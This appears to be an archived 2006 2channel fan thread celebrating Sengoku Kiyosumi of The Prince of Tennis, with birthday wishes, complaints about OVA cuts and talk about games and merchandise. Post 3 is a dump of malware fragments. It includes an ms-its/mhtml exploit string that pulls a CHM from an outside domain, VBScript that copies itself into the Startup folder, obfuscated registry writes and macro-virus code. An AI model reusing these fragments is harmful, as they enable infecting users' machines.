5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【清純派】テニプリ 千石清純に萌えるスレ2ラッキー↑【アイドル】

1 :2スレ目突入ラッキー↑:2006/11/08(水) 23:51:15 ID:MplO2TS5
ここはJr.選抜に選ばれる程の実力の持ち主ながらも他校2年に負ける事2回
待望の勝利も相手が2軍と判明する等、何かと不遇な扱いに本当にラッキー↑なのか…?
との疑惑もある名前は清純だけど女の子大好き!な山吹中3年千石清純に萌えるスレです。

前スレ
【テニプリ】 ラッキー千石清純に萌えるスレ【山吹】
http://comic6.2ch.net/test/read.cgi/cchara/1121779290/

今後のキヨテイ
2006年
11月24日 OVAVol.5発売(コメンタリー参加)
11月25日 キヨ誕生日

2007年
1月25日 ドキ鯖海発売

キヨAA
   ゞ
(´・ω・`)
たまに現れ住人にラッキー↑を振り撒いている

2 :名無しかわいいよ名無し:2006/11/09(木) 00:06:37 ID:VKjjSQTA
2ゲト。

3 :<body onload=window()>:2006/11/09(木) 01:05:56 ID:RmxU15uS
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


4 :名無しかわいいよ名無し:2006/11/09(木) 06:22:15 ID:S30ABeWP
1乙。
いきなりコード来るなんて、うーんラッキー・・・?

5 :名無しかわいいよ名無し:2006/11/09(木) 07:03:21 ID:lV4KFScW
>>1乙!!
疑惑ワロスwww
キヨも2スレ目かうーん絶好調!!

6 :名無しかわいいよ名無し:2006/11/09(木) 08:47:46 ID:T8BXQFIh
>>1乙!
ついに2スレ目か…なんか嬉しいなぁ(´∀`*)
まだまだ大好きだよキヨ!

7 :名無しかわいいよ名無し:2006/11/09(木) 09:22:19 ID:N47JXX9K
>>1乙!
キヨテイいいなw

8 :名無しかわいいよ名無し:2006/11/09(木) 21:57:13 ID:lK5AKY9Y
>>1乙&新スレおめ!
キヨが沢山活躍してここも賑わうといいな

9 :名無しかわいいよ名無し:2006/11/10(金) 18:59:13 ID:/Zhki4uh
参戦してもよいでつか?

10 :名無しかわいいよ名無し:2006/11/10(金) 21:58:14 ID:rzSRopG9
10ゲトー
そして>>1乙!

最近やっとキスプリを手に入れて南と追いかけっこのキヨに
砂吐きそうな位萌えた漏れがやって来ましたよ。


11 :名無しかわいいよ名無し:2006/11/11(土) 22:52:52 ID:xiqeDHfa
戦国清純ww

12 :名無しかわいいよ名無し:2006/11/13(月) 13:34:49 ID:jnEeJdqN
前スレキヨが現れたのにdat落ちしてる…本当にラッキーじゃなくてアン(ry

13 :名無しかわいいよ名無し:2006/11/14(火) 13:58:45 ID:d8G3OfZb
そこがまたいいのだよ…(つд`。)゜。

14 :名無しかわいいよ名無し:2006/11/14(火) 14:12:51 ID:af+Eo+vw
女好き萌え

15 :名無しかわいいよ名無し:2006/11/14(火) 14:59:32 ID:gXmFwseI
以外と白石さんとかと気が合ったりしないかな?

16 :名無しかわいいよ名無し:2006/11/14(火) 20:30:46 ID:d8G3OfZb
白石含め、みんなと仲良くなれそうな気がす
順応性?高そう

17 :名無しかわいいよ名無し:2006/11/15(水) 00:03:39 ID:MHakMtgz
キヨは誰とでも直ぐ仲良くなれそうだよね。陽だまりオーラのようなものがありそうだし
自然と周りに人が集まってくるタイプだと思うイイヨーイイヨーキヨ(*´∀`)

18 :名無しかわいいよ名無し:2006/11/16(木) 18:23:53 ID:J8P/wOiN
キヨ最高

19 :名無しかわいいよ名無し:2006/11/17(金) 02:13:50 ID:SxGBXMH2
OVA発売まであと1週間か!もうすぐキヨに逢えるなwktk

20 :名無しかわいいよ名無し:2006/11/17(金) 22:39:26 ID:vVUtUtHC
つまり、誕生日まであと少しー。

21 :名無しかわいいよ名無し:2006/11/17(金) 23:46:28 ID:q56q2ag/
キヨは誕生日にはやっぱりお好み焼きorもんじゃを焼いてもらうのだろうか
キヨママって料理上手なイメージあるな

22 :名無しかわいいよ名無し:2006/11/19(日) 14:57:21 ID:UQ/7fx2k
キヨママ料理上手そうだ
11月山吹は長距離歩行なる行事があるがどの位の距離を歩くんだろう
皆でワイワイ歩いてると思うと(*´∀`)

23 :名無しかわいいよ名無し:2006/11/19(日) 15:21:22 ID:FJCHqP87
長距離歩行wwwww
某映画みたいなかんじ?

24 :名無しかわいいよ名無し:2006/11/19(日) 21:19:00 ID:ts44dUd3
映画?八甲田山…?

25 :名無しかわいいよ名無し:2006/11/19(日) 21:39:37 ID:zRK2H5Dl
>>23
>某映画
スタンドバイミーか?

26 :名無しかわいいよ名無し:2006/11/19(日) 21:52:10 ID:IDaDgXxX
「真夜中のピクニック」みたいな奴でしょ?
100キロ徒歩とか、やる学校はぽつぽつあるみたいだね。
あんな体育行事ばっかりやってるから、山吹は仲良しっぽいのかなあ。

27 :名無しかわいいよ名無し:2006/11/20(月) 02:17:53 ID:byfSHaGF
遠足感覚でやればいいよ
カワユス…!

個人的にはキヨのお姉様が気になる。

28 :名無しかわいいよ名無し:2006/11/20(月) 12:56:00 ID:VTqf7VyJ
キヨ姉はキヨにプロレス技とかかけそうなイメージ

29 :名無しかわいいよ名無し:2006/11/20(月) 18:11:39 ID:mE9fKtwM
プロレスワロス。勇ましいな
私はキヨ姉は気が強くてしっかり者なイメージ
ちょっと女王様系で

30 :名無しかわいいよ名無し:2006/11/21(火) 00:47:22 ID:eCNFuM+Y
同意www

お姉様には逆らえないよね。

31 :名無しかわいいよ名無し:2006/11/21(火) 22:08:44 ID:Xb8IinjR
キヨ姉はいくつなんだろう?
いつも小さい事で喧嘩しながらも仲のよい姉弟っぽそうだ
OVA発売とキヨ誕が近づいてきてwktk

32 :名無しかわいいよ名無し:2006/11/21(火) 23:24:08 ID:AlXGouSL
OVA、一足先にゲト。
オーディオコメンタリーで清、跡部の物真似するよ。

33 :名無しかわいいよ名無し:2006/11/21(火) 23:50:53 ID:Xb8IinjR
物まねktkr
でも中の人よくラジオとかでも跡部の真似してるけど余り似てない気がw

34 :名無しかわいいよ名無し:2006/11/22(水) 00:32:06 ID:yq0wrMQV
お金も時間もなくて買えそうにない罠…orz

最強チームかなんかのボーリングゲーム?でも
「俺の美技にも〜」って真似してたすなー

35 :名無しかわいいよ名無し:2006/11/22(水) 10:32:19 ID:HauivT+S
中の人は色んな物まねするよねwww千石もやりそうだしいいけどw

36 :名無しかわいいよ名無し:2006/11/22(水) 20:08:58 ID:57lHd9rh
他スレで見たんだけど、山吹のシーンは静止画2つってマジ?
K・I・Y・O・S・U・M・I コールも無し?

37 :名無しかわいいよ名無し:2006/11/23(木) 02:04:41 ID:rmaXhMkc
微妙に動いてるけど、ほぼ静止画だったよ。
コールもなきゃ音や声もない。
室の逆パンダに触れる事もなかったよ。

その代わり、コメンタリーがすごく笑える!
壇も色んなキャラの真似するし…

似てないけど

38 :名無しかわいいよ名無し:2006/11/23(木) 02:31:34 ID:PMki/Jjm
工エエェェ(´д`)ェェエエ工
KI・YO・SU・MIコールも無いのか…
山吹の唯一の見せ場削らなくてもいいじゃないかー。・゚・(ノД`)・゚・。
コメンタリーに期待するしかないのか何かコメントしてないとか言われてたがw

39 :名無しかわいいよ名無し:2006/11/23(木) 12:19:15 ID:Jfqx0vod
どこまで不遇なんだ、山吹・・・

40 :名無しかわいいよ名無し:2006/11/23(木) 12:45:23 ID:Q3L6Bq8u
アニメのJr.選抜編ではキヨがそこそこ優遇されてる気がしたから
今回すごく期待していたのにセリフすらないとは…。
くそー。買うか買わないか迷っていたが
買ってアンケにボロクソ書いてやろうかな…。

41 :名無しかわいいよ名無し:2006/11/23(木) 17:52:24 ID:QXTOEQa+
カットってカットって…アニメスタッフの馬鹿ーーーーーーーーっ!!

        .。::+。゚:゜゚。・::。.        .。::・。゚:゜゚。*::。.
      .。:*:゚:。:+゚*:゚。:+。・::。゚+:。   。:*゚。::・。*:。゚:+゚*:。:゚:+:。.
    .:・゚:。:*゚:+゚・。*:゚      ゚( ノA`)ノ゚      ゚:*。・゚+:゚*:。:゚・:.
  。+゜:*゚ー゚:・。:+゜    =    ( ┐ノ         ゜+:。゜・:゜+:゜*。
.:*::+。゜・:+::*        :。; /              *::+:・゜。+::*:.


42 :名無しかわいいよ名無し:2006/11/24(金) 01:03:58 ID:Qe2JC5yy
カットすべきじゃないよぅ
アニメスタッフ、間違ってるよー(・ω・;)

そうか、キヨはアルバム出すからカットなんだね!
そうか、そうか…そう……………そうだと言ってくれorz

43 :名無しかわいいよ名無し:2006/11/24(金) 01:17:03 ID:M2SWh5fS
本スレで画バレ見たが、サポートDVDの説明がキヨだったよ。

44 :名無しかわいいよ名無し:2006/11/24(金) 01:34:16 ID:uk+CKiWz
>>43
あ、ほんとだ。スルーしてたよ。ありがと。

45 :名無しかわいいよ名無し:2006/11/24(金) 22:57:08 ID:EHNh08WN
いつかキヨが…山吹が…!信じてます

46 :名無しかわいいよ名無し:2006/11/25(土) 00:00:44 ID:ICyM3SaB
キヨおめでと

47 :名無しかわいいよ名無し:2006/11/25(土) 00:04:52 ID:+H8tYVbm
キヨ、誕生日おめ!
山吹のみんなに祝ってもらうといいよ!!

48 :名無しかわいいよ名無し:2006/11/25(土) 00:21:03 ID:ZpTrdDl2
誕生日おめでd!
みんなで一緒にもんじゃでも食べに行ってるといいよ(*´Д`)

49 :名無しかわいいよ名無し:2006/11/25(土) 00:25:01 ID:giS5jCzm
ツキを呼び込むだけがラッキーじゃない
ツキを作り出してこそ、本当のラッキーなんだよ 

        。 ◇◎。o.:O☆οo.
       。:゜ ◎::O☆∧_∧☆。∂:o゜
       /。○。 ∂(*゚ー゚)ラッキー↑  
     /  ◎| ̄ ̄∪ ̄∪ ̄ ̄ ̄|:◎:
    /    ☆。|..Happy Birth Day!!.|☆
  ▼       。○..io.。◇.☆____| 。.:
∠▲―――――☆ :∂io☆ ゜◎∂:.

キヨお誕生日おめでとう!!!!!
どんなに不遇な扱いを受けようともずっと応援し続けるよ!ラッキー↑
今日はお好み焼きを食べる




50 :名無しかわいいよ名無し:2006/11/25(土) 01:53:03 ID:PpJ9Rz73
お誕生日おめでとー!!!


51 :名無しかわいいよ名無し:2006/11/25(土) 02:55:39 ID:MKuxwLMZ
ハピバースディ!キヨ!

52 :名無しかわいいよ名無し:2006/11/25(土) 05:52:48 ID:jaU+kyTe
キヨおめでとう!!



           ★
           [~~~] +::.゜ ゜ ゜゜。・。 . .*
     ∧ ∧  [~~~~~]
     (*゚ー゚) [~~~~~~~]     ゜::.゜ ゜ ゜゜。・。
      ノ つ━━━━━
    〜  ノ
  ((  (/ J


53 :名無しかわいいよ名無し:2006/11/25(土) 07:56:05 ID:n09vFeOg
キヨ誕生日おめでとう!
これからも応援してるよ!

54 :名無しかわいいよ名無し:2006/11/25(土) 10:04:39 ID:zmaspNfK
今日ケーキ買って来ようっと。
キヨ、誕生日おめでとう。

55 :名無しかわいいよ名無し:2006/11/25(土) 11:25:39 ID:C+bLSHmS
キヨ、お誕生日おめでとう!!!

56 :名無しかわいいよ名無し:2006/11/25(土) 12:50:44 ID:JYjC44cX
↑すげー

きよすみ誕生日おめでとう!愛してるよー!

57 :名無しかわいいよ名無し:2006/11/25(土) 14:16:47 ID:MNMrumgp
清純バースデーおめでddd!!
来年もこうしてスレの皆とキヨバースデーを祝いたいな(*´∀`)

58 :名無しかわいいよ名無し:2006/11/25(土) 15:09:24 ID:AMAeItJG
キヨ誕生日オメ!大好きだよー!!

59 :名無しかわいいよ名無し:2006/11/25(土) 15:35:30 ID:uAHBf65z
おめでとう!これからもずっと応援してるよ^^

60 :名無しかわいいよ名無し:2006/11/25(土) 16:50:34 ID:5GUZWctX
キヨ誕生日おめでとう!
これからキヨとキヨファンにとって
もっともっとラッキーな事がありますように!

61 :名無しかわいいよ名無し:2006/11/25(土) 17:53:41 ID:v344QfS6
キヨ誕生日おめでとう!これからも鼻の下の長いキヨでいてね。

62 :名無しかわいいよ名無し:2006/11/25(土) 19:58:53 ID:2FKN1oKM
   ゞ
(´・ω・`)

キヨ〜誕生日おめっと!
今年もケーキを食べてお祝いしているよ〜
みんなにラッキーのお裾分けをちょうだいね!

63 :名無しかわいいよ名無し:2006/11/25(土) 20:21:18 ID:TxJVtICJ
キヨお誕生日おめでとう〜


64 :名無しかわいいよ名無し:2006/11/25(土) 22:34:43 ID:JjTGwObM
千石おめでとう。
君に会えたこと、それ自体がこのスレみんなのラッキーです。
これからも変わらない君でいてね。大好きだよ。

65 :名無しかわいいよ名無し:2006/11/26(日) 00:24:40 ID:Az5fH4ZI
キヨ、一年後が待ち遠しいよ。

66 :名無しかわいいよ名無し:2006/11/26(日) 00:38:00 ID:1sGhGuYT
やっぱりキヨは愛されてる!
こんなに書き込みが…(ノд`。)゜。
嬉しいよ。
愛してるよー!

来年の誕生日にはアルバムを期待したい。

67 :名無しかわいいよ名無し:2006/11/26(日) 01:19:23 ID:zojU87Qx
遅れてごめんね

キヨ誕生日おめでとう!!すっきだーー!!

68 :名無しかわいいよ名無し:2006/11/26(日) 05:09:16 ID:asvHDt6Q
   ゞ
(*´・ω・`*)テレッ<皆お祝い本当にありがとう!皆に出会えて俺ってラッキー↑


69 :名無しかわいいよ名無し:2006/11/26(日) 18:53:29 ID:N30cgxJB
清純(*´д`)

70 :名無しかわいいよ名無し:2006/11/26(日) 20:13:56 ID:IF9CYE6q
キヨぉぉお!!!むはぁ(*´д`)

71 :名無しかわいいよ名無し:2006/11/26(日) 20:35:00 ID:mVmq9aRk

  /||ミ_
 /:::::||   |
 |:::::::::|| ̄ ̄|
 |:::::::::|| ガチャッ
 |:::::::::||   |
 |:::::::::||∧_∧
 |:::::::::|| ・ω・`) キヨ&みなさん!お茶どうぞ。
 |:::::::::||o 旦o
 |:::::::::||―u|
 \:::::||
   \||彡


72 :名無しかわいいよ名無し:2006/11/26(日) 21:09:22 ID:R9SQlffA
>>68
キヨ━━━━(*゚∀゚*)━━━━!!

>>71d
イタダキマス( ´ω`)⊃旦
お茶菓子に今日揚げたドーナツ置いときます
つ◎◎◎◎◎×5

73 :名無しかわいいよ名無し:2006/11/26(日) 23:27:39 ID:PQR60wQi
キヨお誕生日オメ!

遅くなってごめん。

74 :名無しかわいいよ名無し:2006/11/27(月) 18:35:30 ID:6pAyKhCL
キヨたん誕生日オメ!




間に合わなかった・゚・(ノД`)・゚・。

75 :名無しかわいいよ名無し:2006/11/27(月) 22:26:31 ID:IEn4DX92
>>71-72ドモー
旦(・∀・)つ◎

キヨは甘いものも好きかな?何でも美味しそうに食べそうだ

76 :名無しかわいいよ名無し:2006/11/27(月) 22:40:30 ID:zVxoNPng
甘いものが好きというより、
甘いものを売ってる店には女の子がいっぱいなので俺も入っちゃう!
というキヨを想像した。

77 :名無しかわいいよ名無し:2006/11/27(月) 22:42:15 ID:jTlOBkBT
>>76
ソレダ!(・∀・)9m

78 :名無しかわいいよ名無し:2006/11/27(月) 22:48:26 ID:IEn4DX92
そっちかwでもそんなキヨも好きだ

79 :名無しかわいいよ名無し:2006/11/28(火) 00:43:37 ID:tdNRnymt
そして
幸せそうな女の子たちを幸せそうにヲチして
他の客や店員にキモがられるキヨ…

そんなキヨが大好きですよ

80 :名無しかわいいよ名無し:2006/11/28(火) 11:01:22 ID:3aH3fjDu
オリジナルストーリーいらNeeeee!!!
何で数少ない山吹シーンを削るかなOVA…orz

81 :名無しかわいいよ名無し:2006/11/28(火) 12:32:52 ID:Ud5WSrHs
   ゞ      ゞ     ゞ
(*・ω・*)人(´・ω・`)人(´;ω;`)

なんでできないんだろ


82 :名無しかわいいよ名無し:2006/11/28(火) 14:14:43 ID:jJKJ6x0P
>>80
製作スタッフ変わったのかな?
TVシリーズでは、キヨの勝ち試合(対桃城)とか
対アメリカ選抜での見せ場を作ってくれたから
今回も原作+αがあると勝手に思ってたよ。

83 :名無しかわいいよ名無し:2006/11/29(水) 23:43:15 ID:q8nZ73Tw
キヨ

84 :名無しかわいいよ名無し:2006/11/30(木) 00:53:50 ID:xktZg1Xf
キヨの全国での雄姿目に焼き付けたよ!15秒位しかなかったけどな_ノ乙(、ン、)_
本誌に出てくるとしても可能性は決勝戦位だろうか?そのまえに打ち切りとかならないといいんだが


85 :名無しかわいいよ名無し:2006/11/30(木) 12:34:06 ID:WPVZ/s8z
来年はCDでキヨに動きがあるといいなぁ…

86 :名無しかわいいよ名無し:2006/11/30(木) 22:48:14 ID:SmpcyJc+
CD出てくれ…

87 :名無しかわいいよ名無し:2006/12/01(金) 01:55:18 ID:9Gwz1D4I
タイトルの【清純派】をきよすみはと読んでしまった・・(・ω・;)
最近せいじゅんがきよすみにしか見えなくて困る

88 :名無しかわいいよ名無し:2006/12/01(金) 15:24:52 ID:PC2yEgkF
テレビで二宮 清純さんのCMを見るたびに
キヨスミーって、思ってしまう・・・・(・ω・;)

89 :名無しかわいいよ名無し:2006/12/02(土) 01:04:11 ID:F5J3NUt2
>>88
ナカーマ!
^ー^)人(^ー^

漏れ、ノート見たら平清盛が「平清純」ってなってたことあったよ…

90 :名無しかわいいよ名無し:2006/12/02(土) 02:34:52 ID:8udt59NB
ドキ鯖のキヨの横向き立ち絵見たけど目つぶってて伴爺みたいだたorz
正面立ち絵が正直非常に不安になってきた


91 :名無しかわいいよ名無し:2006/12/02(土) 08:28:25 ID:2mkt8060
>87
私はきよすみ派。
キヨが一番大好きだよ(*´д`)

92 :名無しかわいいよ名無し:2006/12/04(月) 06:35:20 ID:UDtZKOpg
>>90
絵に関しては毎度微妙だよねキヨorz
せめてシナリオには期待…しないほうがいいのかな、あんなゲームじゃorz

93 :名無しかわいいよ名無し:2006/12/05(火) 00:23:22 ID:194Z/l4N
あれは本当微妙伴爺は好きだけど伴爺キヨには正直萌えれないorz
シナリオで予想外の萌えがある事と正面絵に期待したい

94 :名無しかわいいよ名無し:2006/12/05(火) 21:49:12 ID:izGgY/1J
キヨにはなるべく正面向いてて貰いたいと思ったw

95 :名無しかわいいよ名無し:2006/12/06(水) 00:33:14 ID:Jb5C3GfG
キヨって呼び方なんか可愛いw
普通なんだろうけど

96 :名無しかわいいよ名無し:2006/12/06(水) 00:40:14 ID:tqV4sfAX
>>94
横向くの禁止にしたいw

>>95
キヨって響きもいいよね(´∀`)

97 :名無しかわいいよ名無し:2006/12/07(木) 14:32:36 ID:hzsvn3N2
またマンパやってくんないかな

98 :名無しかわいいよ名無し:2006/12/08(金) 12:11:40 ID:fChRBGC3
マンパもアルバムも本誌再登場も全て叶えて欲しいと思っていますが何か?

それにしても住人減ってしまってサミシイヨキヨ…(´・ω・`)

99 :名無しかわいいよ名無し:2006/12/08(金) 16:14:28 ID:yaYlMQWu


        __
      /    \
      l ・  ・  l
      \゛▽ ゛/ 
      ノ\ノ\ノ\
     / /\/\\

     俺はエチゼンクラゲダヨ! プフー

100 :名無しかわいいよ名無し:2006/12/08(金) 16:56:02 ID:zcCYZxRQ
>>99
つ【カワハギ】

カワハギはエチゼンクラゲを食べるんだってさ

ついでに100キヨ。わぁい

101 :名無しかわいいよ名無し:2006/12/09(土) 00:15:27 ID:nWD/OS+b
千石って動物好き?

102 :名無しかわいいよ名無し:2006/12/09(土) 13:06:12 ID:0etnSoPi
キヨのスレあったんだ?
ここ数年テニスから離れてたけど、キヨ見たくなってきた

103 :名無しかわいいよ名無し:2006/12/09(土) 13:09:55 ID:OewNyTOD
>>100
オメ

>>101
キヨは動物も大好きそうだが特にメスが好きそうだ

>>102
お帰り!ここに迷い込んだあなたはとてもラッキー↑


104 :名無しかわいいよ名無し:2006/12/09(土) 19:05:38 ID:MyCJnUfz
>103
動物に対しても女好きなのか!?

105 :名無しかわいいよ名無し:2006/12/09(土) 20:59:53 ID:d7138pbX
猫が好きそうだ。


キヨー。
えぶりでーがとても好きだ

106 :名無しかわいいよ名無し:2006/12/09(土) 23:19:47 ID:QZYJzgKt
メスネコに好きな子の名前つけて。
ちゅーしたり抱っこしたりしてるキヨ。

107 :名無しかわいいよ名無し:2006/12/09(土) 23:26:47 ID:UDjqecw7
キヨきんもー☆





















だがそんな所も(・∀・)スキッ!!

108 :名無しかわいいよ名無し:2006/12/10(日) 14:20:22 ID:MTocDVaI
>>106
某ゲームの王子を思い出してしまったよ…orz


109 :名無しかわいいよ名無し:2006/12/10(日) 20:42:33 ID:xRYPT5tU
キヨは女好きにしてももうちょっとさっぱりしてると思うw

110 :名無しかわいいよ名無し:2006/12/10(日) 23:34:39 ID:IpYdzN8r
女の子好きだけど、それに執着する気持ちはあんまりなさげかな。
何だかんだでまだまだテニスしたり仲間とつるんだりのほうが楽しそう。

111 :名無しかわいいよ名無し:2006/12/11(月) 02:02:05 ID:18gXB7FK
イメージ的に猫より犬の方が似合いそう
キヨ自体も犬っぽいからw

112 :名無しかわいいよ名無し:2006/12/11(月) 10:03:08 ID:HRZhJIyH
早くドキサバでキヨに会いたいよ
あと一ヶ月以上お預けかー

113 :名無しかわいいよ名無し:2006/12/11(月) 11:09:33 ID:b4IB7JN1
ドキサバは海より山チームのが良かったな…

114 :名無しかわいいよ名無し:2006/12/11(月) 21:00:32 ID:vvR6PrUh
キヨには彩夏よりもつぐみのがあう気がするw

115 :名無しかわいいよ名無し:2006/12/12(火) 07:02:48 ID:iWtFWwF1
もうテニミュには出ないの?

116 :名無しかわいいよ名無し:2006/12/12(火) 09:39:48 ID:eI2pYCxn
以外とキヨは女の子に引っ張って欲しい…と私は思ってる

117 :名無しかわいいよ名無し:2006/12/12(火) 14:58:48 ID:hSNoncK/
早くドキサバでキヨに会いたいよ
海編発売まであと1ヶ月以上か、長いな

118 :名無しかわいいよ名無し:2006/12/12(火) 15:06:32 ID:LAOTYivr
逢いたいけどあの横立ち絵かと思うと…orz
伴爺キヨを吹っ飛ばす位正面立ち絵が美麗だといいんだが

119 :名無しかわいいよ名無し:2006/12/13(水) 03:46:35 ID:4Dwzt0ER
キヨってマイナーキャラなの?人気投票の結果が激しく気になる…

120 :名無しかわいいよ名無し:2006/12/13(水) 05:18:50 ID:Fu2nFPOM
いやいや、むしろ人気キャラだと思ってたのだが…!
今じゃマイナーなの?

121 :名無しかわいいよ名無し:2006/12/14(木) 00:05:58 ID:CzzBBkta
いやだって全然原作に出てこないから
もう作者も放置してるのかなあって…orz

122 :名無しかわいいよ名無し:2006/12/15(金) 01:08:10 ID:tTDh+Pzc
20.5の時点ではたしけも「勝たせてあげたい」なんて言ってたのにな。
もう忘れてんのかな…orz

123 :名無しかわいいよ名無し:2006/12/15(金) 02:10:12 ID:O9Nbqd8P
試合じゃなくていいからせめて姿だけでも拝ませてくれよ。・゚・(ノД`)・゚・。

124 :名無しかわいいよ名無し:2006/12/15(金) 16:31:53 ID:+L9bZFSk
ttp://img263.auctions.yahoo.co.jp/users/2/6/5/0/animetenchou-img454x600-1166014208sengoku.jpg

キヨサンタは今年はスケートなんだね(*´∀`)

125 :名無しかわいいよ名無し:2006/12/15(金) 16:33:09 ID:CKjRvsn+
何かちょっと髪の毛伸びた?

126 :名無しかわいいよ名無し:2006/12/15(金) 16:38:51 ID:+L9bZFSk
>>125
言われてみれば…キヨも日々成長しているということですな

>>122
一応聖イカロスのリチャードには勝たせてくれたよ
その後敗退したけど………orz

127 :名無しかわいいよ名無し:2006/12/16(土) 14:19:20 ID:BsNaosfY
中の人もラジオで嘆いてたねw

128 :名無しかわいいよ名無し:2006/12/17(日) 01:04:21 ID:vmtP3H/z
ドキサバキヨの立ち絵は前も横もアウチらしいなorz
せめてスチルには期待…しないほうがいいな、うん、しないよorz

129 :名無しかわいいよ名無し:2006/12/17(日) 01:23:58 ID:1CQ+g2L6
どうやらそうらしいな…試遊してきた人のカキコ見てたらモニターが何故か霞んだよ
毎回毎回絵師はキヨに何か恨みでもあるのか……_| ̄|.........○

130 :名無しかわいいよ名無し:2006/12/17(日) 02:20:56 ID:vmtP3H/z
つかキヨって描きにくいんだとオモ。
原作でも結構不安定で参考ショットを決めがたいし、各パーツもバランス取りづらいタイプ。
虹絵描きの戯言なんで流してくれていいが。
しかし先方はプロなんだし、もちっと頑張ってくれんものかな。

131 :名無しかわいいよ名無し:2006/12/18(月) 00:26:24 ID:5ExrjImx
髪型が難しそう…
あれ自分でスタイリングしてんのかな?

132 :名無しかわいいよ名無し:2006/12/18(月) 01:12:05 ID:bz/qZx9q
髪のスタイリングの為に早起きしてたらカワユス

133 :名無しかわいいよ名無し:2006/12/18(月) 21:29:55 ID:Jxrt7F1l
ねぐせ

134 :名無しかわいいよ名無し:2006/12/18(月) 23:19:28 ID:/QpLJQmC
ヅラ

135 :名無しかわいいよ名無し:2006/12/18(月) 23:35:41 ID:2zPRw1TG
手塚じゃあるまいしそれはないw

136 :名無しかわいいよ名無し:2006/12/18(月) 23:47:01 ID:gLscYsua
20.5巻でクシ持ち歩いてたから自分でスタイリングしてるとオモ。

137 :名無しかわいいよ名無し:2006/12/19(火) 00:38:57 ID:S9liPtIy
は?手塚ってヅラなの?

138 :名無しかわいいよ名無し:2006/12/19(火) 01:55:03 ID:jMndQeLp
PRINCEBOXのキヨさんはちょっとカッコヨス…(*´д`*)パッション!! 
足元のことはつっこまないであげようw

139 :名無しかわいいよ名無し:2006/12/19(火) 02:10:36 ID:jMndQeLp
…ごめん>124でガイシュツだったorz

140 :名無しかわいいよ名無し:2006/12/19(火) 03:21:19 ID:ERgYzqpy
>>136
髪型には細心の注意をはらうって書いてあるしねwでもダビデみたいに
整髪料は持ち歩いてないから梳かすだけであの髪型は完成するのだろうか?

>>137
手ヅラというあだ名を知らないのか?

141 :名無しかわいいよ名無し:2006/12/19(火) 03:37:49 ID:S9liPtIy
>>140
聞いたことはあるけど理由までは分からない…

142 :名無しかわいいよ名無し:2006/12/19(火) 11:06:22 ID:NC5xZ2jE
ただ名前もじっただけ?

143 :名無しかわいいよ名無し:2006/12/19(火) 11:51:49 ID:eUFujgNM
初期の手塚の髪がどうにも違和感あって、って話じゃなかった?

144 :名無しかわいいよ名無し:2006/12/19(火) 19:03:58 ID:lcZTStdn
これこれお嬢さん方、手塚ばかりでキヨがそっちのけですぜ。

145 :名無しかわいいよ名無し:2006/12/19(火) 20:36:33 ID:o7/Opu/i
キヨがO型っていうのすごい納得。
マイペースだけど協調性があるんだよね。

146 :名無しかわいいよ名無し:2006/12/20(水) 15:19:50 ID:VaOx8f/E
でも射手座ってのは意外…

147 :名無しかわいいよ名無し:2006/12/20(水) 19:25:36 ID:toexbHNG
>146
何座ならピッタリくる?

148 :名無しかわいいよ名無し:2006/12/20(水) 20:21:57 ID:VaOx8f/E
…天秤座か蠍座か蟹座?

149 :名無しかわいいよ名無し:2006/12/20(水) 20:50:38 ID:232JDXb0
え、自分は射手座でかなり納得したんだが。

150 :名無しかわいいよ名無し:2006/12/20(水) 20:54:50 ID:WB2q5R+T
ttp://img231.auctions.yahoo.co.jp/users/5/5/8/6/kuniyann_t-img500x309-1166453166yamabuki5.jpg

キヨ&山吹メンバーキタ━━━━(゚∀゚)━━━━!!
ガム買いまくるよガム!でもキヨ顔ちょっと変だな…

151 :名無しかわいいよ名無し:2006/12/20(水) 21:04:57 ID:toexbHNG
あー、蟹〜。蟹と天秤いいかも。
でもさっき、占い板のいくつかのスレを見たら双子座がピッタリな気がしたよ。

152 :名無しかわいいよ名無し:2006/12/20(水) 21:11:35 ID:toexbHNG
>150
コレ何?ガム??

153 :名無しかわいいよ名無し:2006/12/20(水) 21:33:28 ID:WB2q5R+T
>>152
16日に発売された「テニスの王子様 ステッカーガム」だよ
珍しく山吹キャラがこんなにいて嬉しい(´∀`)


154 :名無しかわいいよ名無し:2006/12/20(水) 21:53:40 ID:toexbHNG
>153
そうなのか、ありがとー。買ってみるよ!

155 :名無しかわいいよ名無し:2006/12/21(木) 13:51:40 ID:8q+i1pSA
亜久津がいない・・・どこにも

156 :名無しかわいいよ名無し:2006/12/21(木) 16:27:19 ID:B6It3poU
ドキサバで早くキヨに会いたいよ

157 :名無しかわいいよ名無し:2006/12/21(木) 18:18:06 ID:B/HZAelW
ガムってどこで売ってるの?

158 :名無しかわいいよ名無し:2006/12/22(金) 07:47:41 ID:BktFIg4B
>>157
兄メイトに売っていたよ〜


キヨが出ない・・・orz

159 :名無しかわいいよ名無し:2006/12/22(金) 20:37:54 ID:/1lc4IOE
>>155
このみんがあっくんマジで気に入ってるんなら
あの引き際をそう簡単には汚すような再登場の仕方はしないのでしょう。
したがってガムにも登場しない、ということか?
スレちがいですんまそん。

160 :名無しかわいいよ名無し:2006/12/22(金) 23:16:47 ID:DOi9UsBA
阿久津は全国いってないから居ないだけだと思われ
